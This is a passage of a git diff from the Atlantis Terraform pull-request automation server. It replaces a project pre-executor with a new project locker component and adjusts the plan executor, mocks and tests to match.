len(params) > 0 { - _param0 = make([]func(string) string, len(params[0])) + _param0 = make([]string, len(params[0])) for u, param := range params[0] { - _param0[u] = param.(func(string) string) + _param0[u] = param.(string) } } return diff --git a/server/events/mocks/mock_project_pre_executor.go b/server/events/mocks/mock_project_pre_executor.go deleted file mode 100644 index cd36116f3a..0000000000 --- a/server/events/mocks/mock_project_pre_executor.go +++ /dev/null @@ -1,85 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectPreExecutor) - -package mocks - -import ( - "reflect" - - pegomock "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" - models "github.com/runatlantis/atlantis/server/events/models" -) - -type MockProjectPreExecutor struct { - fail func(message string, callerSkip ...int) -} - -func NewMockProjectPreExecutor() *MockProjectPreExecutor { - return &MockProjectPreExecutor{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) events.PreExecuteResult { - params := []pegomock.Param{ctx, repoDir, project} - result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.PreExecuteResult)(nil)).Elem()}) - var ret0 events.PreExecuteResult - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.PreExecuteResult) - } - } - return ret0 -} - -func (mock *MockProjectPreExecutor) VerifyWasCalledOnce() *VerifierProjectPreExecutor { - return &VerifierProjectPreExecutor{mock, pegomock.Times(1), nil} -} - -func (mock *MockProjectPreExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectPreExecutor { - return &VerifierProjectPreExecutor{mock, invocationCountMatcher, nil} -} - -func (mock *MockProjectPreExecutor) 
VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectPreExecutor { - return &VerifierProjectPreExecutor{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierProjectPreExecutor struct { - mock *MockProjectPreExecutor - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) *ProjectPreExecutor_Execute_OngoingVerification { - params := []pegomock.Param{ctx, repoDir, project} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params) - return &ProjectPreExecutor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type ProjectPreExecutor_Execute_OngoingVerification struct { - mock *MockProjectPreExecutor - methodInvocations []pegomock.MethodInvocation -} - -func (c *ProjectPreExecutor_Execute_OngoingVerification) GetCapturedArguments() (*events.CommandContext, string, models.Project) { - ctx, repoDir, project := c.GetAllCapturedArguments() - return ctx[len(ctx)-1], repoDir[len(repoDir)-1], project[len(project)-1] -} - -func (c *ProjectPreExecutor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []string, _param2 []models.Project) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - _param1 = make([]string, len(params[1])) - for u, param := range params[1] { - _param1[u] = param.(string) - } - _param2 = make([]models.Project, len(params[2])) - for u, param := range params[2] { - _param2[u] = param.(models.Project) - } - } - return -} diff --git 
a/server/events/plan_executor.go b/server/events/plan_executor.go index 478de10a22..d994021723 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -15,12 +15,10 @@ package events import ( "fmt" - "os" - "path/filepath" - "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" @@ -28,27 +26,21 @@ import ( //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator -// LockURLGenerator consumes lock URLs. type LockURLGenerator interface { - // SetLockURL takes a function that given a lock id, will return a url - // to view that lock. - SetLockURL(func(id string) (url string)) + GenerateLockURL(lockID string) string } -// atlantisUserTFVar is the name of the variable we execute terraform -// with, containing the vcs username of who is running the command -const atlantisUserTFVar = "atlantis_user" - -// PlanExecutor handles everything related to running terraform plan. +/**/ // PlanExecutor handles everything related to running terraform plan. type PlanExecutor struct { - VCSClient vcs.ClientProxy - Terraform terraform.Client - Locker locking.Locker - LockURL func(id string) (url string) - Run run.Runner - Workspace AtlantisWorkspace - ProjectPreExecute ProjectPreExecutor - ProjectFinder ProjectFinder + VCSClient vcs.ClientProxy + Terraform terraform.Client + Locker locking.Locker + Run run.Runner + Workspace AtlantisWorkspace + ProjectFinder ProjectFinder + ProjectLocker ProjectLocker + ExecutionPlanner *repoconfig.ExecutionPlanner + LockURLGenerator LockURLGenerator } // PlanSuccess is the result of a successful plan. 
@@ -57,12 +49,6 @@ type PlanSuccess struct { LockURL string } -// SetLockURL takes a function that given a lock id, will return a url -// to view that lock. -func (p *PlanExecutor) SetLockURL(f func(id string) (url string)) { - p.LockURL = f -} - // Execute executes terraform plan for the ctx. func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) @@ -70,79 +56,32 @@ func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { return CommandResponse{Error: err} } - var projects []models.Project - if ctx.Command.Dir == "" { - // If they didn't specify a directory to plan in, figure out what - // projects have been modified so we know where to run plan. - modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "getting modified files")} - } - ctx.Log.Info("found %d files modified in this pull request", len(modifiedFiles)) - projects = p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, cloneDir) - if len(projects) == 0 { - return CommandResponse{Failure: "No Terraform files were modified."} - } - } else { - projects = []models.Project{{ - Path: ctx.Command.Dir, - RepoFullName: ctx.BaseRepo.FullName, - }} + stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) + if err != nil { + return CommandResponse{Error: err} } - var results []ProjectResult - for _, project := range projects { - ctx.Log.Info("running plan for project at path %q", project.Path) - result := p.plan(ctx, cloneDir, project) - result.Path = project.Path - results = append(results, result) + tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) + if err != nil { + return CommandResponse{ProjectResults: 
[]ProjectResult{{Error: err}}} } - return CommandResponse{ProjectResults: results} -} - -func (p *PlanExecutor) plan(ctx *CommandContext, repoDir string, project models.Project) ProjectResult { - preExecute := p.ProjectPreExecute.Execute(ctx, repoDir, project) - if preExecute.ProjectResult != (ProjectResult{}) { - return preExecute.ProjectResult + if !tryLockResponse.LockAcquired { + return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} } - config := preExecute.ProjectConfig - terraformVersion := preExecute.TerraformVersion - workspace := ctx.Command.Workspace - // Run terraform plan. - planFile := filepath.Join(repoDir, project.Path, fmt.Sprintf("%s.tfplan", workspace)) - userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username) - planExtraArgs := config.GetExtraArguments(ctx.Command.Name.String()) - tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, planExtraArgs...), ctx.Command.Flags...) - - // Check if env/{workspace}.tfvars exist. - envFileName := filepath.Join("env", workspace+".tfvars") - if _, err := os.Stat(filepath.Join(repoDir, project.Path, envFileName)); err == nil { - tfPlanCmd = append(tfPlanCmd, "-var-file", envFileName) - } - output, err := p.Terraform.RunCommandWithVersion(ctx.Log, filepath.Join(repoDir, project.Path), tfPlanCmd, terraformVersion, workspace) + out, err := stage.Run() if err != nil { // Plan failed so unlock the state. 
- if _, unlockErr := p.Locker.Unlock(preExecute.LockResponse.LockKey); unlockErr != nil { - ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) + if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) } - return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)} + return CommandResponse{ProjectResults: []ProjectResult{{Error: fmt.Errorf("%s\n%s", err.Error(), out)}}} } - ctx.Log.Info("plan succeeded") - // If there are post plan commands then run them. - if len(config.PostPlan) > 0 { - absolutePath := filepath.Join(repoDir, project.Path) - _, err := p.Run.Execute(ctx.Log, config.PostPlan, absolutePath, workspace, terraformVersion, "post_plan") - if err != nil { - return ProjectResult{Error: errors.Wrap(err, "running post plan commands")} - } - } - - return ProjectResult{ + return CommandResponse{ProjectResults: []ProjectResult{{ PlanSuccess: &PlanSuccess{ - TerraformOutput: output, - LockURL: p.LockURL(preExecute.LockResponse.LockKey), + TerraformOutput: out, + LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), }, - } + }}} } diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go index 24e5452c9b..c9a209fe64 100644 --- a/server/events/plan_executor_test.go +++ b/server/events/plan_executor_test.go @@ -284,8 +284,5 @@ func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClie Locker: locker, Run: run, } - p.LockURL = func(id string) (url string) { - return "lockurl-" + id - } return &p, runner, locker } diff --git a/server/events/project_locker.go b/server/events/project_locker.go new file mode 100644 index 0000000000..9b7060585b --- /dev/null +++ b/server/events/project_locker.go @@ -0,0 +1,87 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events + +import ( + "fmt" + + "github.com/runatlantis/atlantis/server/events/locking" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/terraform" +) + +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker + +// ProjectLocker locks this project against other plans being run until this +// project is unlocked. +type ProjectLocker interface { + // TryLock attempts to acquire the lock for this project. The returned + // TryLockResponse.LockAcquired will be true if the lock was acquired; if + // it is false, TryLockResponse.LockFailureReason describes why not. + // TryLockResponse.UnlockFn is a function that can be called to unlock the + // lock. It will only be set if the lock was acquired. Any errors will set + // error. + TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) +} + +// DefaultProjectLocker implements ProjectLocker. +type DefaultProjectLocker struct { + Locker locking.Locker + ConfigReader ProjectConfigReader + Terraform terraform.Client + Run run.Runner +} + +// TryLockResponse is the result of trying to lock a project. +type TryLockResponse struct { + // LockAcquired is true if the lock was acquired. + LockAcquired bool + // LockFailureReason is the reason why the lock was not acquired. It will + // only be set if LockAcquired is false. 
+ LockFailureReason string + // UnlockFn will unlock the lock created by the caller. This might be called + // if there is an error later and the caller doesn't want to continue to + // hold the lock. + UnlockFn func() error + // LockKey is the key for the lock if the lock was acquired. + LockKey string +} + +// TryLock implements ProjectLocker.TryLock. +func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) { + workspace := ctx.Command.Workspace + lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User) + if err != nil { + return nil, err + } + if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num { + failureMsg := fmt.Sprintf( + "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.", + lockAttempt.CurrLock.Pull.Num) + return &TryLockResponse{ + LockAcquired: false, + LockFailureReason: failureMsg, + }, nil + } + ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey) + return &TryLockResponse{ + LockAcquired: true, + UnlockFn: func() error { + _, err := p.Locker.Unlock(lockAttempt.LockKey) + return err + }, + LockKey: lockAttempt.LockKey, + }, nil +} diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go new file mode 100644 index 0000000000..fd95503487 --- /dev/null +++ b/server/events/project_locker_test.go @@ -0,0 +1,269 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events_test + +//import ( +// . "github.com/petergtz/pegomock" +// . "github.com/runatlantis/atlantis/testing" +//) + +//var ctx = events.CommandContext{ +// Command: &events.Command{ +// Name: events.Plan, +// }, +// Log: logging.NewNoopLogger(), +//} +//var project = models.Project{} +// +//func TestExecute_LockErr(t *testing.T) { +// t.Log("when there is an error returned from TryLock we return it") +// p, l, _, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_LockFailed(t *testing.T) { +// t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error") +// p, l, _, _ := setupPreExecuteTest(t) +// // The response has LockAcquired: false and the pull request is a number +// // different than the current pull. +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: false, +// CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}}, +// }, nil) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "This project is currently locked by #1. 
The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure) +//} +// +//func TestExecute_ConfigErr(t *testing.T) { +// t.Log("when there is an error loading config, we return it") +// p, l, _, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_PreInitErr(t *testing.T) { +// t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it") +// p, l, tm, r := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// PreInit: []string{"pre-init"}, +// }, nil) +// tfVersion, _ := version.NewVersion("0.9.0") +// When(tm.Version()).ThenReturn(tfVersion) +// When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_InitErr(t *testing.T) { +// t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it") +// p, l, tm, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// tfVersion, _ := version.NewVersion("0.9.0") +// 
When(tm.Version()).ThenReturn(tfVersion) +// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_PreGetErr(t *testing.T) { +// t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it") +// p, l, tm, r := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// PreGet: []string{"pre-get"}, +// }, nil) +// tfVersion, _ := version.NewVersion("0.8") +// When(tm.Version()).ThenReturn(tfVersion) +// When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_GetErr(t *testing.T) { +// t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it") +// p, l, tm, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// tfVersion, _ := version.NewVersion("0.8") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_PreCommandErr(t *testing.T) { +// t.Log("when we get an error running pre commands we return it") +// p, l, tm, r := setupPreExecuteTest(t) +// When(l.TryLock(project, 
"", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// PrePlan: []string{"command"}, +// }, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) +// When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_SuccessTF9(t *testing.T) { +// t.Log("when the project is on tf >= 0.9 it should be successful") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PreInit: []string{"pre-init"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion) +// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init") +//} +// +//func TestExecute_SuccessTF8(t *testing.T) { +// t.Log("when the project is on tf < 0.9 it should be successful") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, 
ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PreGet: []string{"pre-get"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.8") +// When(tm.Version()).ThenReturn(tfVersion) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "") +// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get") +//} +// +//func TestExecute_SuccessPrePlan(t *testing.T) { +// t.Log("when there are pre_plan commands they are run") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PrePlan: []string{"command"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan") +//} +// +//func TestExecute_SuccessPreApply(t *testing.T) { +// t.Log("when there are pre_apply commands they are run") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ 
+// PreApply: []string{"command"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// +// cpCtx := deepcopy.Copy(ctx).(events.CommandContext) +// cpCtx.Command = &events.Command{ +// Name: events.Apply, +// } +// cpCtx.Log = logging.NewNoopLogger() +// +// res := p.Execute(&cpCtx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply") +//} +// +//func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectLocker, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) { +// RegisterMockTestingT(t) +// l := lmocks.NewMockLocker() +// cr := mocks.NewMockProjectConfigReader() +// tm := tmocks.NewMockClient() +// r := rmocks.NewMockRunner() +// return &events.DefaultProjectLocker{ +// Locker: l, +// ConfigReader: cr, +// Terraform: tm, +// Run: r, +// }, l, tm, r +//} diff --git a/server/events/project_pre_execute.go b/server/events/project_pre_execute.go deleted file mode 100644 index b9f1625336..0000000000 --- a/server/events/project_pre_execute.go +++ /dev/null @@ -1,140 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. 
-// -package events - -import ( - "fmt" - "path/filepath" - "strings" - - "github.com/hashicorp/go-version" - "github.com/pkg/errors" - "github.com/runatlantis/atlantis/server/events/locking" - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/terraform" -) - -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_pre_executor.go ProjectPreExecutor - -// ProjectPreExecutor executes before the plan and apply executors. It handles -// the setup tasks that are common to both plan and apply. -type ProjectPreExecutor interface { - // Execute executes the pre plan/apply tasks. - Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult -} - -// DefaultProjectPreExecutor implements ProjectPreExecutor. -type DefaultProjectPreExecutor struct { - Locker locking.Locker - ConfigReader ProjectConfigReader - Terraform terraform.Client - Run run.Runner -} - -// PreExecuteResult is the result of running the pre execute. -type PreExecuteResult struct { - ProjectResult ProjectResult - ProjectConfig ProjectConfig - TerraformVersion *version.Version - LockResponse locking.TryLockResponse -} - -// Execute executes the pre plan/apply tasks. -func (p *DefaultProjectPreExecutor) Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult { - workspace := ctx.Command.Workspace - lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User) - if err != nil { - return PreExecuteResult{ProjectResult: ProjectResult{Error: errors.Wrap(err, "acquiring lock")}} - } - if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num { - return PreExecuteResult{ProjectResult: ProjectResult{Failure: fmt.Sprintf( - "This project is currently locked by #%d. 
The locking plan must be applied or discarded before future plans can execute.", - lockAttempt.CurrLock.Pull.Num)}} - } - ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey) - config, tfVersion, err := p.executeWithLock(ctx, repoDir, project) - if err != nil { - p.Locker.Unlock(lockAttempt.LockKey) // nolint: errcheck - return PreExecuteResult{ProjectResult: ProjectResult{Error: err}} - } - return PreExecuteResult{ProjectConfig: config, TerraformVersion: tfVersion, LockResponse: lockAttempt} -} - -// executeWithLock executes the pre plan/apply tasks after the lock has been -// acquired. This helper func makes revoking the lock on error easier. -// Returns the project config, terraform version, or an error. -func (p *DefaultProjectPreExecutor) executeWithLock(ctx *CommandContext, repoDir string, project models.Project) (ProjectConfig, *version.Version, error) { - workspace := ctx.Command.Workspace - - // Check if config file is found, if not we continue the run. - var config ProjectConfig - absolutePath := filepath.Join(repoDir, project.Path) - if p.ConfigReader.Exists(absolutePath) { - var err error - config, err = p.ConfigReader.Read(absolutePath) - if err != nil { - return config, nil, err - } - ctx.Log.Info("parsed atlantis config file in %q", absolutePath) - } - - // Check if terraform version is >= 0.9.0. - terraformVersion := p.Terraform.Version() - if config.TerraformVersion != nil { - terraformVersion = config.TerraformVersion - } - constraints, _ := version.NewConstraint(">= 0.9.0") - if constraints.Check(terraformVersion) { - ctx.Log.Info("determined that we are running terraform with version >= 0.9.0. 
Running version %s", terraformVersion) - if len(config.PreInit) > 0 { - _, err := p.Run.Execute(ctx.Log, config.PreInit, absolutePath, workspace, terraformVersion, "pre_init") - if err != nil { - return config, nil, errors.Wrapf(err, "running %s commands", "pre_init") - } - } - _, err := p.Terraform.Init(ctx.Log, absolutePath, workspace, config.GetExtraArguments("init"), terraformVersion) - if err != nil { - return config, nil, err - } - } else { - ctx.Log.Info("determined that we are running terraform with version < 0.9.0. Running version %s", terraformVersion) - if len(config.PreGet) > 0 { - _, err := p.Run.Execute(ctx.Log, config.PreGet, absolutePath, workspace, terraformVersion, "pre_get") - if err != nil { - return config, nil, errors.Wrapf(err, "running %s commands", "pre_get") - } - } - terraformGetCmd := append([]string{"get", "-no-color"}, config.GetExtraArguments("get")...) - _, err := p.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, terraformGetCmd, terraformVersion, workspace) - if err != nil { - return config, nil, err - } - } - - stage := fmt.Sprintf("pre_%s", strings.ToLower(ctx.Command.Name.String())) - var commands []string - if ctx.Command.Name == Plan { - commands = config.PrePlan - } else { - commands = config.PreApply - } - if len(commands) > 0 { - _, err := p.Run.Execute(ctx.Log, commands, absolutePath, workspace, terraformVersion, stage) - if err != nil { - return config, nil, errors.Wrapf(err, "running %s commands", stage) - } - } - return config, terraformVersion, nil -} diff --git a/server/events/project_pre_execute_test.go b/server/events/project_pre_execute_test.go deleted file mode 100644 index 27814055f2..0000000000 --- a/server/events/project_pre_execute_test.go +++ /dev/null @@ -1,282 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. 
-// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events_test - -import ( - "errors" - "testing" - - "github.com/hashicorp/go-version" - "github.com/mohae/deepcopy" - . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/locking" - lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks" - "github.com/runatlantis/atlantis/server/events/mocks" - "github.com/runatlantis/atlantis/server/events/models" - rmocks "github.com/runatlantis/atlantis/server/events/run/mocks" - tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/logging" - . 
